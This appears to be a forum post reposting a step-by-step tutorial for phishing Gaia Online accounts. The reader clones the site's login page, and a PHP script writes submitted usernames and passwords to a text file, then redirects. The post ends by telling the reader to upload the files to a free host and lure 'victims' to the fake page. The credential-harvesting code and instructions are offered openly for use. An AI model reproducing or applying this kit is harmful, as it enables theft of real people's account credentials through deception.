Wasn't sure which section to put this in, lol I did not make this tut, but i tested and it works Ok first of all, make 3 notepad documents name them login.html login.php Info.txt Then go to gaiaonline.com then go to your hacking mules profile then right-click [add comment] then select copy shortcut then log out, then paste the shortcut in the toolbar and then click View, then select source. When it comes up press Ctrl + A then copy it. After you have done that paste it in login.html ....... Now for login.php Copy the code below then paste it in login.php Code (Text): <div class="text" id="{CB}" style="font-family: monospace;"><ol><li style="padding: 0 5px; background-color: #fff; line-height: 16px; border-bottom: 1px solid #efefef; border-left: 1px solid #999;"><?php</li><li style="padding: 0 5px; background-color: #f9f9f9; line-height: 16px; border-bottom: 1px solid #efefef; border-left: 1px solid #999;">echo('<html><meta http-equiv="refresh" content="0;THIS IS WHERE YOU PUT YOUR LINK"></html>');</li><li style="padding: 0 5px; background-color: #fff; line-height: 16px; border-bottom: 1px solid #efefef; border-left: 1px solid #999;"> </li><li style="padding: 0 5px; background-color: #f9f9f9; line-height: 16px; border-bottom: 1px solid #efefef; border-left: 1px solid #999;">@$username = addslashes($_POST['username']);</li><li style="padding: 0 5px; background-color: #fff; line-height: 16px; border-bottom: 1px solid #efefef; border-left: 1px solid #999;">@$password = addslashes($_POST['password']);</li><li style="padding: 0 5px; background-color: #f9f9f9; line-height: 16px; border-bottom: 1px solid #efefef; border-left: 1px solid #999;"> </li><li style="padding: 0 5px; background-color: #fff; line-height: 16px; border-bottom: 1px solid #efefef; border-left: 1px solid #999;">$fileContents=file_get_contents("info.txt");</li><li style="padding: 0 5px; background-color: #f9f9f9; line-height: 16px; border-bottom: 1px solid #efefef; border-left: 1px solid #999;">$file = fopen("info.txt","r+");</li><li style="padding: 0 5px; background-color: #fff; line-height: 16px; border-bottom: 1px solid #efefef; border-left: 1px solid #999;">$fileContents=$fileContents . "\n" . $username . "\t" . $password;</li><li style="padding: 0 5px; background-color: #f9f9f9; line-height: 16px; border-bottom: 1px solid #efefef; border-left: 1px solid #999;">fwrite($file,$fileContents);</li><li style="padding: 0 5px; background-color: #fff; line-height: 16px; border-bottom: 1px solid #efefef; border-left: 1px solid #999;">fclose($file);</li></ol></div> Now that you have pasted it in login.php, save it. Now back to Login.html Search (ctrl+f) for Code (Text): <div class="text" id="{CB}" style="font-family: monospace;"><ol><li style="padding: 0 5px; background-color: #fff; line-height: 16px; border-bottom: 1px solid #efefef; border-left: 1px solid #999;"><form method="post" action=</li></ol></div> then delete the link next to it exept for Login.php .... then save it. Then where the code says: THIS IS WHERE YOUR LINK GOES , delete it then add the link that adds a comment to your profile. Save it. Now go to a website called ripway.com, then register and click upload files, now upload Login.php+Login.html+Info.txt ..... Now find some victims and link them to your fake login page...